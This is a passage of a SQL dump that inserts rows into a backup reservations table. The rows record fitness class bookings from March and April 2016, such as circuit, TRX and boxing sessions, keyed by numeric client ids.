(6281, 30, 'CTR', '2016-03-07', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6282, 180, 'CTR', '2016-03-07', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6283, 180, 'CTR', '2016-03-07', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6284, 222, 'CTR', '2016-03-09', '17h30', '18h', 'TRX Suspension Training'),
(6285, 221, 'CTR', '2016-03-09', '17h30', '18h', 'TRX Suspension Training'),
(6286, 48, 'CTR', '2016-03-09', '17h30', '18h', 'TRX Suspension Training'),
(6287, 31, 'CTR', '2016-03-09', '17h30', '18h', 'TRX Suspension Training'),
(6288, 48, 'CTR', '2016-03-09', '18h15', '18h45', 'Circuit Training'),
(6289, 31, 'CTR', '2016-03-09', '18h15', '18h45', 'Circuit Training'),
(6290, 195, 'CTR', '2016-03-09', '18h15', '18h45', 'Circuit Training'),
(6291, 195, 'CTR', '2016-03-09', '18h15', '18h45', 'Circuit Training'),
(6292, 165, 'CTR', '2016-03-09', '19h ', '19h30', 'Circuit training'),
(6335, 29, 'CTR', '2016-03-10', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6295, 168, 'CTR', '2016-03-09', '19h ', '19h30', 'Circuit training'),
(6296, 205, 'CTR', '2016-03-09', '19h ', '19h30', 'Circuit training'),
(6437, 230, 'CTR', '2016-03-19', '14h00', '14h30', 'Circuit Niveau 1'),
(6298, 80, 'CTR', '2016-03-09', '20h30', '21h', 'Circuit Training'),
(6299, 80, 'CTR', '2016-03-09', '20h30', '21h', 'Circuit Training'),
(6300, 80, 'CTR', '2016-03-09', '20h30', '21h', 'Circuit Training'),
(6301, 80, 'CTR', '2016-03-09', '20h30', '21h', 'Circuit Training'),
(6320, 210, 'CTR', '2016-03-09', '17h30', '18h', 'TRX Suspension Training'),
(6303, 80, 'CTR', '2016-03-09', '20h30', '21h', 'Circuit Training'),
(6304, 80, 'CTR', '2016-03-09', '20h30', '21h', 'Circuit Training'),
(6305, 60, 'CTR', '2016-03-09', '20h30', '21h', 'Circuit Training'),
(6306, 142, 'CTR', '2016-03-10', '18h15', '18h45', 'Circuit Training'),
(6307, 143, 'CTR', '2016-03-10', '18h15', '18h45', 'Circuit Training'),
(6308, 189, 'CTR', '2016-03-10', '12h00', '12h30', 'Circuit training'),
(6309, 213, 'CTR', '2016-03-08', '19h00', '19h30', 'Duo Training'),
(6310, 209, 'CTR', '2016-03-10', '19h00', '19h30', 'Personal Training'),
(6311, 213, 'CTR', '2016-03-13', '10h15', '10h45', 'Duo Training'),
(6312, 44, 'CTR', '2016-03-09', '18h15', '18h45', 'Circuit Training'),
(6313, 103, 'CTR', '2016-03-07', '18h15', '18h45', 'Heart Zone partie 1'),
(6314, 103, 'CTR', '2016-03-07', '18h45', '19h15', 'Heart Zone partie 2'),
(6315, 211, 'CTR', '2016-03-10', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6316, 29, 'CTR', '2016-03-09', '17h30', '18h', 'TRX Suspension Training'),
(6318, 192, 'CTR', '2016-03-09', '18h15', '18h45', 'Circuit Training'),
(6319, 231, 'CTR', '2016-03-09', '18h15', '18h45', 'Circuit Training'),
(6321, 217, 'CTR', '2016-03-10', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6322, 41, 'CTR', '2016-03-14', '18h15', '18h45', 'Heart Zone partie 1'),
(6323, 41, 'CTR', '2016-03-14', '18h45', '19h15', 'Heart Zone partie 2'),
(6324, 41, 'CTR', '2016-03-16', '19h ', '19h30', 'Circuit training'),
(6325, 41, 'CTR', '2016-03-17', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6326, 69, 'CTR', '2016-03-09', '17h30', '18h', 'TRX Suspension Training'),
(6327, 216, 'CTR', '2016-03-10', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6328, 193, 'CTR', '2016-03-14', '18h15', '18h45', 'Heart Zone partie 1'),
(6329, 193, 'CTR', '2016-03-14', '18h45', '19h15', 'Heart Zone partie 2'),
(6330, 134, 'CTR', '2016-03-10', '18h15', '18h45', 'Circuit Training'),
(6331, 228, 'CTR', '2016-03-12', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6391, 228, 'CTR', '2016-03-12', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6333, 37, 'CTR', '2016-03-09', '17h30', '18h', 'TRX Suspension Training'),
(6334, 210, 'CTR', '2016-03-09', '18h15', '18h45', 'Circuit Training'),
(6336, 188, 'CTR', '2016-03-10', '12h00', '12h30', 'Circuit training'),
(6337, 205, 'CTR', '2016-03-10', '12h00', '12h30', 'Circuit training'),
(6338, 49, 'CTR', '2016-03-10', '12h00', '12h30', 'Circuit training'),
(6339, 35, 'CTR', '2016-03-10', '12h45', '13h15', 'Circuit training'),
(6340, 210, 'CTR', '2016-03-12', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6341, 210, 'CTR', '2016-03-12', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6342, 37, 'CTR', '2016-03-14', '18h15', '18h45', 'Heart Zone partie 1'),
(6343, 37, 'CTR', '2016-03-14', '18h45', '19h15', 'Heart Zone partie 2'),
(6435, 210, 'CTR', '2016-03-19', '14h00', '14h30', 'Circuit Niveau 1'),
(6400, 230, 'CTR', '2016-03-16', '18h15', '18h45', 'Circuit Training'),
(6346, 14, 'CTR', '2016-03-14', '18h15', '18h45', 'Heart Zone partie 1'),
(6347, 14, 'CTR', '2016-03-14', '18h45', '19h15', 'Heart Zone partie 2'),
(6348, 138, 'CTR', '2016-03-14', '18h15', '18h45', 'Heart Zone partie 1'),
(6349, 138, 'CTR', '2016-03-14', '18h45', '19h15', 'Heart Zone partie 2'),
(6350, 48, 'CTR', '2016-03-14', '18h15', '18h45', 'Heart Zone partie 1'),
(6351, 48, 'CTR', '2016-03-14', '18h45', '19h15', 'Heart Zone partie 2'),
(6352, 50, 'CTR', '2016-03-14', '18h15', '18h45', 'Heart Zone partie 1'),
(6353, 50, 'CTR', '2016-03-14', '18h45', '19h15', 'Heart Zone partie 2'),
(6354, 80, 'CTR', '2016-03-14', '18h45', '19h15', 'Heart Zone partie 2'),
(6356, 80, 'CTR', '2016-03-14', '18h15', '18h45', 'Heart Zone partie 1'),
(6357, 195, 'CTR', '2016-03-14', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6358, 195, 'CTR', '2016-03-14', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6359, 195, 'CTR', '2016-03-14', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6360, 195, 'CTR', '2016-03-14', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6361, 173, 'CTR', '2016-03-14', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6362, 173, 'CTR', '2016-03-14', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6363, 92, 'CTR', '2016-03-14', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6364, 92, 'CTR', '2016-03-14', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6365, 30, 'CTR', '2016-03-14', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6366, 30, 'CTR', '2016-03-14', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6367, 132, 'CTR', '2016-03-16', '20h30', '21h', 'Circuit Training'),
(6368, 60, 'CTR', '2016-03-16', '20h30', '21h', 'Circuit Training'),
(6369, 180, 'CTR', '2016-03-16', '20h30', '21h', 'Circuit Training'),
(6370, 173, 'CTR', '2016-03-16', '20h30', '21h', 'Circuit Training'),
(6371, 188, 'CTR', '2016-03-16', '20h30', '21h', 'Circuit Training'),
(6372, 188, 'CTR', '2016-03-16', '20h30', '21h', 'Circuit Training'),
(6373, 138, 'CTR', '2016-03-16', '19h ', '19h30', 'Circuit training'),
(6374, 168, 'CTR', '2016-03-16', '19h ', '19h30', 'Circuit training'),
(6436, 210, 'CTR', '2016-03-19', '14h40', '15h10', 'Circuit Niveau 2'),
(6376, 165, 'CTR', '2016-03-16', '19h ', '19h30', 'Circuit training'),
(6377, 14, 'CTR', '2016-03-16', '19h ', '19h30', 'Circuit training'),
(6426, 191, 'CTR', '2016-03-17', '18h15', '18h45', 'Circuit Training'),
(6379, 164, 'CTR', '2016-03-16', '19h ', '19h30', 'Circuit training'),
(6414, 192, 'CTR', '2016-03-16', '17h30', '18h', 'TRX Suspension Training'),
(6381, 48, 'CTR', '2016-03-16', '18h15', '18h45', 'Circuit Training'),
(6382, 31, 'CTR', '2016-03-16', '18h15', '18h45', 'Circuit Training'),
(6383, 231, 'CTR', '2016-03-16', '18h15', '18h45', 'Circuit Training'),
(6384, 195, 'CTR', '2016-03-16', '18h15', '18h45', 'Circuit Training'),
(6385, 195, 'CTR', '2016-03-16', '18h15', '18h45', 'Circuit Training'),
(6421, 29, 'CTR', '2016-03-17', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6387, 69, 'CTR', '2016-03-16', '17h30', '18h', 'TRX Suspension Training'),
(6388, 48, 'CTR', '2016-03-16', '17h30', '18h', 'TRX Suspension Training'),
(6390, 31, 'CTR', '2016-03-16', '17h30', '18h', 'TRX Suspension Training'),
(6392, 227, 'CTR', '2016-03-12', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6393, 227, 'CTR', '2016-03-12', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6394, 230, 'CTR', '2016-03-12', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6438, 230, 'CTR', '2016-03-19', '14h40', '15h10', 'Circuit Niveau 2'),
(6466, 210, 'CTR', '2016-03-24', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6397, 192, 'CTR', '2016-03-12', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6398, 192, 'CTR', '2016-03-12', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6399, 44, 'CTR', '2016-03-12', '10h15', '10h45', 'Circuit Niveau 1'),
(6434, 48, 'CTR', '2016-03-19', '15h15', '15h45', 'Circuit Niveau 3'),
(6405, 205, 'CTR', '2016-03-14', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6406, 205, 'CTR', '2016-03-14', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6407, 103, 'CTR', '2016-03-16', '19h ', '19h30', 'Circuit training'),
(6439, 31, 'CTR', '2016-03-19', '14h40', '15h10', 'Circuit Niveau 2'),
(6440, 31, 'CTR', '2016-03-19', '15h15', '15h45', 'Circuit Niveau 3'),
(6411, 205, 'CTR', '2016-03-16', '20h30', '21h', 'Circuit Training'),
(6433, 48, 'CTR', '2016-03-19', '14h40', '15h10', 'Circuit Niveau 2'),
(6415, 192, 'CTR', '2016-03-16', '18h15', '18h45', 'Circuit Training'),
(6416, 232, 'CTR', '2016-03-16', '19h ', '19h30', 'Circuit training'),
(6417, 233, 'CTR', '2016-03-16', '19h ', '19h30', 'Circuit training'),
(6419, 44, 'CTR', '2016-03-16', '18h15', '18h45', 'Circuit Training'),
(6420, 44, 'CTR', '2016-03-17', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6431, 80, 'CTR', '2016-03-17', '12h00', '12h30', 'Circuit training'),
(6423, 189, 'CTR', '2016-03-17', '12h00', '12h30', 'Circuit training'),
(6424, 205, 'CTR', '2016-03-17', '12h00', '12h30', 'Circuit training'),
(6425, 188, 'CTR', '2016-03-17', '12h00', '12h30', 'Circuit training'),
(6427, 134, 'CTR', '2016-03-17', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6428, 140, 'CTR', '2016-03-17', '12h00', '12h30', 'Circuit training'),
(6429, 218, 'CTR', '2016-03-17', '18h15', '18h45', 'Circuit Training'),
(6430, 142, 'CTR', '2016-03-17', '18h15', '18h45', 'Circuit Training'),
(6442, 132, 'CTR', '2016-03-23', '20h30', '21h', 'Circuit Training'),
(6443, 192, 'CTR', '2016-03-21', '18h15', '18h45', 'Heart Zone partie 1'),
(6444, 192, 'CTR', '2016-03-21', '18h45', '19h15', 'Heart Zone partie 2'),
(6445, 48, 'CTR', '2016-03-21', '18h15', '18h45', 'Heart Zone partie 1'),
(6446, 48, 'CTR', '2016-03-21', '18h45', '19h15', 'Heart Zone partie 2'),
(6450, 228, 'CTR', '2016-03-21', '18h15', '18h45', 'Heart Zone partie 1'),
(6448, 31, 'CTR', '2016-03-23', '17h30', '18h', 'TRX Suspension Training'),
(6449, 31, 'CTR', '2016-03-23', '18h15', '18h45', 'Circuit Training'),
(6451, 228, 'CTR', '2016-03-21', '18h45', '19h15', 'Heart Zone partie 2'),
(6452, 227, 'CTR', '2016-03-21', '18h15', '18h45', 'Heart Zone partie 1'),
(6453, 227, 'CTR', '2016-03-21', '18h45', '19h15', 'Heart Zone partie 2'),
(6457, 50, 'CTR', '2016-03-21', '18h45', '19h15', 'Heart Zone partie 2'),
(6456, 138, 'CTR', '2016-03-23', '18h15', '18h45', 'Circuit Training'),
(6458, 50, 'CTR', '2016-03-21', '18h15', '18h45', 'Heart Zone partie 1'),
(6459, 80, 'CTR', '2016-03-21', '18h15', '18h45', 'Heart Zone partie 1'),
(6460, 80, 'CTR', '2016-03-21', '18h45', '19h15', 'Heart Zone partie 2'),
(6461, 56, 'CTR', '2016-03-21', '18h15', '18h45', 'Heart Zone partie 1'),
(6462, 56, 'CTR', '2016-03-21', '18h45', '19h15', 'Heart Zone partie 2'),
(6463, 230, 'CTR', '2016-03-23', '19h ', '19h30', 'Circuit training'),
(6464, 48, 'CTR', '2016-03-23', '17h30', '18h', 'TRX Suspension Training'),
(6465, 48, 'CTR', '2016-03-23', '18h15', '18h45', 'Circuit Training'),
(6506, 44, 'CTR', '2016-03-24', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6468, 173, 'CTR', '2016-03-23', '20h30', '21h', 'Circuit Training'),
(6469, 60, 'CTR', '2016-03-23', '20h30', '21h', 'Circuit Training'),
(6470, 196, 'CTR', '2016-03-23', '20h30', '21h', 'Circuit Training'),
(6471, 188, 'CTR', '2016-03-23', '20h30', '21h', 'Circuit Training'),
(6472, 188, 'CTR', '2016-03-23', '20h30', '21h', 'Circuit Training'),
(6473, 180, 'CTR', '2016-03-23', '20h30', '21h', 'Circuit Training'),
(6474, 204, 'CTR', '2016-03-23', '20h30', '21h', 'Circuit Training'),
(6475, 212, 'CTR', '2016-03-23', '20h30', '21h', 'Circuit Training'),
(6476, 14, 'CTR', '2016-03-23', '19h ', '19h30', 'Circuit training'),
(6477, 168, 'CTR', '2016-03-23', '19h ', '19h30', 'Circuit training'),
(6493, 211, 'CTR', '2016-03-24', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6488, 188, 'CTR', '2016-03-24', '12h00', '12h30', 'Circuit training'),
(6486, 205, 'CTR', '2016-03-24', '12h00', '12h30', 'Circuit training'),
(6481, 205, 'CTR', '2016-03-23', '19h ', '19h30', 'Circuit training'),
(6482, 205, 'CTR', '2016-03-23', '19h45', '20h15', 'Clubs Sportifs'),
(6507, 121, 'CTR', '2016-03-24', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6485, 140, 'CTR', '2016-03-24', '12h00', '12h30', 'Circuit training'),
(6489, 189, 'CTR', '2016-03-24', '12h00', '12h30', 'Circuit training'),
(6490, 191, 'CTR', '2016-03-24', '18h15', '18h45', 'Circuit Training'),
(6491, 217, 'CTR', '2016-03-24', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6492, 134, 'CTR', '2016-03-24', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6495, 132, 'CTR', '2016-03-30', '20h30', '21h', 'Circuit Training'),
(6496, 173, 'CTR', '2016-03-30', '20h30', '21h', 'Circuit Training'),
(6497, 196, 'CTR', '2016-03-30', '20h30', '21h', 'Circuit Training'),
(6498, 212, 'CTR', '2016-03-30', '20h30', '21h', 'Circuit Training'),
(6499, 204, 'CTR', '2016-03-30', '20h30', '21h', 'Circuit Training'),
(6500, 205, 'CTR', '2016-03-30', '19h ', '19h30', 'Circuit training'),
(6501, 205, 'CTR', '2016-03-30', '19h45', '20h15', 'Clubs Sportifs'),
(6502, 230, 'CTR', '2016-03-30', '19h ', '19h30', 'Circuit training'),
(6503, 138, 'CTR', '2016-03-30', '18h15', '18h45', 'Circuit Training'),
(6504, 48, 'CTR', '2016-03-30', '18h15', '18h45', 'Circuit Training'),
(6520, 210, 'CTR', '2016-03-30', '19h ', '19h30', 'Circuit training'),
(6508, 193, 'CTR', '2016-04-04', '18h15', '18h45', 'Heart Zone partie 1'),
(6509, 193, 'CTR', '2016-04-04', '18h45', '19h15', 'Heart Zone partie 2'),
(6539, 173, 'CTR', '2016-04-04', '18h45', '19h15', 'Heart Zone partie 2'),
(6511, 193, 'CTR', '2016-03-30', '18h15', '18h45', 'Circuit Training'),
(6512, 233, 'CTR', '2016-03-30', '20h30', '21h', 'Circuit Training'),
(6513, 230, 'CTR', '2016-04-02', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6514, 230, 'CTR', '2016-04-02', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6515, 230, 'CTR', '2016-04-04', '18h15', '18h45', 'Heart Zone partie 1'),
(6516, 230, 'CTR', '2016-04-04', '18h45', '19h15', 'Heart Zone partie 2'),
(6519, 210, 'CTR', '2016-03-30', '18h15', '18h45', 'Circuit Training'),
(6518, 48, 'CTR', '2016-03-30', '19h ', '19h30', 'Circuit training'),
(6538, 213, 'CTR', '2016-04-10', '10h15', '10h45', 'Duo Training'),
(6522, 210, 'CTR', '2016-04-02', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6523, 210, 'CTR', '2016-04-02', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6527, 233, 'CTR', '2016-04-06', '20h30', '21h', 'Circuit Training'),
(6525, 140, 'CTR', '2016-03-30', '18h15', '18h45', 'Circuit Training');
INSERT INTO `reservation_reservation_bck` (`id`, `id_client`, `id_salle`, `date`, `heure_deb`, `heure_fin`, `type_seance`) VALUES
(6537, 173, 'CTR', '2016-04-04', '18h15', '18h45', 'Heart Zone partie 1'),
(6528, 48, 'CTR', '2016-04-04', '18h15', '18h45', 'Heart Zone partie 1'),
(6529, 48, 'CTR', '2016-04-04', '18h45', '19h15', 'Heart Zone partie 2'),
(6530, 213, 'CTR', '2016-04-03', '10h15', '10h45', 'Duo Training'),
(6531, 138, 'CTR', '2016-04-04', '18h15', '18h45', 'Heart Zone partie 1'),
(6532, 138, 'CTR', '2016-04-04', '18h45', '19h15', 'Heart Zone partie 2'),
(6533, 180, 'CTR', '2016-04-04', '18h15', '18h45', 'Heart Zone partie 1'),
(6534, 180, 'CTR', '2016-04-04', '18h45', '19h15', 'Heart Zone partie 2'),
(6535, 213, 'CTR', '2016-04-05', '19h00', '19h30', 'Duo Training'),
(6540, 92, 'CTR', '2016-04-04', '18h15', '18h45', 'Heart Zone partie 1'),
(6541, 92, 'CTR', '2016-04-04', '18h45', '19h15', 'Heart Zone partie 2'),
(6542, 171, 'CTR', '2016-04-06', '19h ', '19h30', 'Circuit training'),
(6543, 164, 'CTR', '2016-04-06', '19h ', '19h30', 'Circuit training'),
(6544, 165, 'CTR', '2016-04-06', '19h ', '19h30', 'Circuit training'),
(6545, 168, 'CTR', '2016-04-06', '19h ', '19h30', 'Circuit training'),
(6557, 92, 'CTR', '2016-04-11', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6623, 132, 'CTR', '2016-04-20', '20h30', '21h', 'Circuit Training'),
(6548, 180, 'CTR', '2016-04-06', '20h30', '21h', 'Circuit Training'),
(6549, 60, 'CTR', '2016-04-06', '20h30', '21h', 'Circuit Training'),
(6550, 173, 'CTR', '2016-04-06', '20h30', '21h', 'Circuit Training'),
(6551, 3, 'CTR', '2016-04-06', '20h30', '21h', 'Circuit Training'),
(6553, 188, 'CTR', '2016-04-06', '20h30', '21h', 'Circuit Training'),
(6554, 188, 'CTR', '2016-04-06', '20h30', '21h', 'Circuit Training'),
(6555, 138, 'CTR', '2016-04-06', '18h15', '18h45', 'Circuit Training'),
(6558, 92, 'CTR', '2016-04-11', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6559, 138, 'CTR', '2016-04-11', '18h15', '18h45', 'Heart Zone partie 1'),
(6560, 138, 'CTR', '2016-04-11', '18h45', '19h15', 'Heart Zone partie 2'),
(6561, 230, 'CTR', '2016-04-11', '18h15', '18h45', 'Heart Zone partie 1'),
(6562, 230, 'CTR', '2016-04-11', '18h45', '19h15', 'Heart Zone partie 2'),
(6563, 193, 'CTR', '2016-04-11', '18h15', '18h45', 'Heart Zone partie 1'),
(6564, 193, 'CTR', '2016-04-11', '18h45', '19h15', 'Heart Zone partie 2'),
(6565, 180, 'CTR', '2016-04-11', '18h15', '18h45', 'Heart Zone partie 1'),
(6566, 180, 'CTR', '2016-04-11', '18h45', '19h15', 'Heart Zone partie 2'),
(6693, 192, 'CTR', '2016-04-16', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6667, 195, 'CTR', '2016-04-13', '18h15', '18h45', 'Circuit Training'),
(6569, 173, 'CTR', '2016-04-11', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6570, 173, 'CTR', '2016-04-11', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6571, 48, 'CTR', '2016-04-11', '18h15', '18h45', 'Heart Zone partie 1'),
(6572, 48, 'CTR', '2016-04-11', '18h45', '19h15', 'Heart Zone partie 2'),
(6573, 230, 'CTR', '2016-04-09', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6574, 230, 'CTR', '2016-04-09', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6575, 193, 'CTR', '2016-04-06', '18h15', '18h45', 'Circuit Training'),
(6576, 48, 'CTR', '2016-04-06', '18h15', '18h45', 'Circuit Training'),
(6577, 48, 'CTR', '2016-04-06', '19h ', '19h30', 'Circuit training'),
(6578, 31, 'CTR', '2016-04-06', '18h15', '18h45', 'Circuit Training'),
(6579, 31, 'CTR', '2016-04-06', '19h ', '19h30', 'Circuit training'),
(6582, 210, 'CTR', '2016-04-07', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6581, 181, 'CTR', '2016-04-06', '18h15', '18h45', 'Circuit Training'),
(6583, 210, 'CTR', '2016-04-07', '18h15', '18h45', 'Circuit Training'),
(6874, 56, 'CTR', '2016-05-04', '20h30', '21h', 'Circuit Training'),
(6585, 179, 'CTR', '2016-04-06', '18h15', '18h45', 'Circuit Training'),
(6875, 140, 'CTR', '2016-05-04', '18h15', '18h45', 'Circuit Training'),
(6587, 29, 'CTR', '2016-04-07', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6588, 28, 'CTR', '2016-04-11', '17h30', '18h00', 'TRX Suspension Training'),
(6589, 199, 'CTR', '2016-04-11', '17h30', '18h00', 'TRX Suspension Training'),
(6591, 48, 'CTR', '2016-04-09', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6592, 48, 'CTR', '2016-04-09', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6593, 192, 'CTR', '2016-04-09', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6594, 192, 'CTR', '2016-04-09', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6595, 234, 'CTR', '2016-04-09', '10h15', '10h45', 'Circuit Niveau 1'),
(6596, 234, 'CTR', '2016-04-09', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6621, 56, 'CTR', '2016-04-11', '18h15', '18h45', 'Heart Zone partie 1'),
(6622, 56, 'CTR', '2016-04-11', '18h45', '19h15', 'Heart Zone partie 2'),
(6599, 188, 'CTR', '2016-04-13', '20h30', '21h', 'Circuit Training'),
(6611, 41, 'CTR', '2016-04-11', '18h15', '18h45', 'Heart Zone partie 1'),
(6601, 60, 'CTR', '2016-04-13', '20h30', '21h', 'Circuit Training'),
(6602, 196, 'CTR', '2016-04-13', '20h30', '21h', 'Circuit Training'),
(6603, 180, 'CTR', '2016-04-13', '20h30', '21h', 'Circuit Training'),
(6604, 173, 'CTR', '2016-04-13', '20h30', '21h', 'Circuit Training'),
(6638, 223, 'CTR', '2016-04-13', '17h30', '18h', 'TRX Suspension Training'),
(6606, 233, 'CTR', '2016-04-13', '20h30', '21h', 'Circuit Training'),
(6607, 213, 'CTR', '2016-04-12', '19h00', '19h30', 'Duo Training'),
(6608, 213, 'CTR', '2016-04-17', '10h15', '10h45', 'Duo Training'),
(6696, 48, 'CTR', '2016-04-20', '18h15', '18h45', 'Circuit Training'),
(6610, 188, 'CTR', '2016-04-13', '20h30', '21h', 'Circuit Training'),
(6612, 41, 'CTR', '2016-04-11', '18h45', '19h15', 'Heart Zone partie 2'),
(6625, 228, 'CTR', '2016-04-13', '19h ', '19h30', 'Circuit training'),
(6614, 41, 'CTR', '2016-04-14', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6624, 228, 'CTR', '2016-04-13', '18h15', '18h45', 'Circuit Training'),
(6616, 138, 'CTR', '2016-04-13', '18h15', '18h45', 'Circuit Training'),
(6617, 54, 'CTR', '2016-04-11', '18h15', '18h45', 'Heart Zone partie 1'),
(6618, 54, 'CTR', '2016-04-11', '18h45', '19h15', 'Heart Zone partie 2'),
(6619, 50, 'CTR', '2016-04-11', '18h15', '18h45', 'Heart Zone partie 1'),
(6620, 50, 'CTR', '2016-04-11', '18h45', '19h15', 'Heart Zone partie 2'),
(6626, 227, 'CTR', '2016-04-13', '18h15', '18h45', 'Circuit Training'),
(6627, 227, 'CTR', '2016-04-13', '19h ', '19h30', 'Circuit training'),
(6628, 48, 'CTR', '2016-04-13', '18h15', '18h45', 'Circuit Training'),
(6629, 48, 'CTR', '2016-04-13', '19h ', '19h30', 'Circuit training'),
(6630, 210, 'CTR', '2016-04-14', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6631, 210, 'CTR', '2016-04-14', '18h15', '18h45', 'Circuit Training'),
(6632, 230, 'CTR', '2016-04-13', '18h15', '18h45', 'Circuit Training'),
(6633, 230, 'CTR', '2016-04-13', '19h ', '19h30', 'Circuit training'),
(6634, 140, 'CTR', '2016-04-13', '18h15', '18h45', 'Circuit Training'),
(6692, 192, 'CTR', '2016-04-16', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6637, 165, 'CTR', '2016-04-13', '19h ', '19h30', 'Circuit training'),
(6639, 223, 'CTR', '2016-04-13', '18h15', '18h45', 'Circuit Training'),
(6640, 205, 'CTR', '2016-04-13', '19h ', '19h30', 'Circuit training'),
(6641, 205, 'CTR', '2016-04-13', '19h45', '20h15', 'Clubs Sportifs'),
(6642, 56, 'CTR', '2016-04-13', '20h30', '21h', 'Circuit Training'),
(6757, 44, 'CTR', '2016-04-23', '10h15', '10h45', 'Circuit Niveau 1'),
(6644, 28, 'CTR', '2016-04-18', '17h30', '18h00', 'TRX Suspension Training'),
(6700, 199, 'CTR', '2016-04-18', '17h30', '18h00', 'TRX Suspension Training'),
(6646, 230, 'CTR', '2016-04-18', '18h15', '18h45', 'Heart Zone partie 1'),
(6647, 230, 'CTR', '2016-04-18', '18h45', '19h15', 'Heart Zone partie 2'),
(6695, 48, 'CTR', '2016-04-16', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6694, 48, 'CTR', '2016-04-16', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6650, 41, 'CTR', '2016-04-18', '18h15', '18h45', 'Heart Zone partie 1'),
(6651, 41, 'CTR', '2016-04-18', '18h45', '19h15', 'Heart Zone partie 2'),
(6652, 180, 'CTR', '2016-04-18', '18h15', '18h45', 'Heart Zone partie 1'),
(6653, 180, 'CTR', '2016-04-18', '18h45', '19h15', 'Heart Zone partie 2'),
(6654, 138, 'CTR', '2016-04-18', '18h15', '18h45', 'Heart Zone partie 1'),
(6655, 138, 'CTR', '2016-04-18', '18h45', '19h15', 'Heart Zone partie 2'),
(6656, 48, 'CTR', '2016-04-18', '18h15', '18h45', 'Heart Zone partie 1'),
(6657, 48, 'CTR', '2016-04-18', '18h45', '19h15', 'Heart Zone partie 2'),
(6658, 56, 'CTR', '2016-04-18', '18h15', '18h45', 'Heart Zone partie 1'),
(6659, 56, 'CTR', '2016-04-18', '18h45', '19h15', 'Heart Zone partie 2'),
(6660, 50, 'CTR', '2016-04-18', '18h15', '18h45', 'Heart Zone partie 1'),
(6661, 50, 'CTR', '2016-04-18', '18h45', '19h15', 'Heart Zone partie 2'),
(6662, 92, 'CTR', '2016-04-18', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6663, 92, 'CTR', '2016-04-18', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6664, 173, 'CTR', '2016-04-18', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6665, 173, 'CTR', '2016-04-18', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6687, 54, 'CTR', '2016-04-14', '12h00', '12h30', 'Circuit training'),
(6669, 189, 'CTR', '2016-04-14', '12h00', '12h30', 'Circuit training'),
(6670, 188, 'CTR', '2016-04-14', '12h00', '12h30', 'Circuit training'),
(6671, 49, 'CTR', '2016-04-14', '12h00', '12h30', 'Circuit training'),
(6672, 205, 'CTR', '2016-04-14', '12h00', '12h30', 'Circuit training'),
(6673, 210, 'CTR', '2016-04-16', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6674, 210, 'CTR', '2016-04-16', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6675, 191, 'CTR', '2016-04-14', '18h15', '18h45', 'Circuit Training'),
